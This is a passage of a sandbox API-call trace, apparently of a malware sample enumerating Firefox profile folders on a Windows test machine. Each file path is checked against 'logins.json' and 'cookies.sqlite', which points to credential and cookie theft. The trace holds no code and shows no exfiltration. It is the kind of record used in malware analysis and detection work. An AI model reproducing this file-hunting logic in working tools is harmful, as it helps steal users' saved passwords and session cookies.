HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0160.989] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\", lpString2="Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports" [0160.989] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.989] GetProcessHeap () returned 0x8e0000 [0160.989] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0160.989] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports", lpSrch="logins.json") returned 0x0 [0160.989] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports", lpSrch="cookies.sqlite") returned 0x0 [0160.989] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.989] GetProcessHeap () returned 0x8e0000 [0160.989] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0160.989] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0160.989] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0160.989] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0160.989] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.989] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.989] lstrlenW (lpString="") returned 0 [0160.989] GetProcessHeap () returned 0x8e0000 [0160.989] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926478 [0160.989] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.989] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.989] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.989] lstrlenW (lpString="Profiles") returned 8 [0160.989] GetProcessHeap () returned 0x8e0000 [0160.989] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8e) returned 0x912b88 [0160.989] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.989] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0160.989] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.989] GetProcessHeap () returned 0x8e0000 [0160.990] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0160.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0160.990] lstrlenW (lpString="") returned 0 [0160.990] GetProcessHeap () returned 0x8e0000 [0160.990] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8e) returned 0x926478 [0160.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0160.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0160.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0160.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0160.990] lstrlenW (lpString="\\*.*") returned 4 [0160.990] GetProcessHeap () returned 0x8e0000 [0160.990] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x96) returned 0x912c20 [0160.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0160.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*" [0160.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0160.990] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.990] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.990] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.990] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.990] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="silmbjec.default", cAlternateFileName="SILMBJ~1.DEF")) returned 1 [0160.990] lstrcmpiW (lpString1="silmbjec.default", lpString2=".") returned 1 [0160.990] lstrcmpiW (lpString1="silmbjec.default", lpString2="..") returned 1 [0160.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0160.990] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0160.990] lstrlenW (lpString="\\") returned 1 [0160.990] GetProcessHeap () returned 0x8e0000 [0160.990] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x912cc0 [0160.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0160.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0160.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0160.991] lstrlenW (lpString="silmbjec.default") returned 16 [0160.991] GetProcessHeap () returned 0x8e0000 [0160.991] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x9252c0 [0160.991] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0160.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.991] VirtualQuery (in: lpAddress=0x912cc0, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.991] GetProcessHeap () returned 0x8e0000 [0160.991] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912cc0 | out: hHeap=0x8e0000) returned 1 [0160.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.991] lstrlenW (lpString="") returned 0 [0160.991] GetProcessHeap () returned 0x8e0000 [0160.991] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x912cc0 [0160.991] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.991] lstrlenW (lpString="\\*.*") returned 4 [0160.991] GetProcessHeap () returned 0x8e0000 [0160.991] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925378 [0160.991] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*" [0160.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*", lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0160.991] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.992] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.992] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.992] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.992] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb76a6d10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb76a6d10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb76a6d10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0160.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.992] lstrlenW (lpString="\\") returned 1 [0160.992] GetProcessHeap () returned 0x8e0000 [0160.992] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0160.992] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.992] lstrlenW (lpString="addons.json") returned 11 [0160.992] GetProcessHeap () returned 0x8e0000 [0160.992] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9254f8 [0160.992] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.992] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" [0160.992] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.992] GetProcessHeap () returned 0x8e0000 [0160.992] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.992] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="logins.json") returned 0x0 [0160.992] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="cookies.sqlite") returned 0x0 [0160.992] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.992] GetProcessHeap () returned 0x8e0000 [0160.992] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0160.992] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0160.992] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0160.992] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0160.993] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.993] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.993] lstrlenW (lpString="\\") returned 1 [0160.993] GetProcessHeap () returned 0x8e0000 [0160.993] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0160.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.993] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.993] lstrlenW (lpString="bookmarkbackups") returned 15 [0160.993] GetProcessHeap () returned 0x8e0000 [0160.993] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0160.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.993] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.993] GetProcessHeap () returned 0x8e0000 [0160.993] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.993] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.993] lstrlenW (lpString="") returned 0 [0160.993] GetProcessHeap () returned 0x8e0000 [0160.993] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fcf68 [0160.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.993] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.993] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.993] lstrlenW (lpString="\\*.*") returned 4 [0160.993] GetProcessHeap () returned 0x8e0000 [0160.993] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x925438 [0160.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.993] lstrcatW (in: 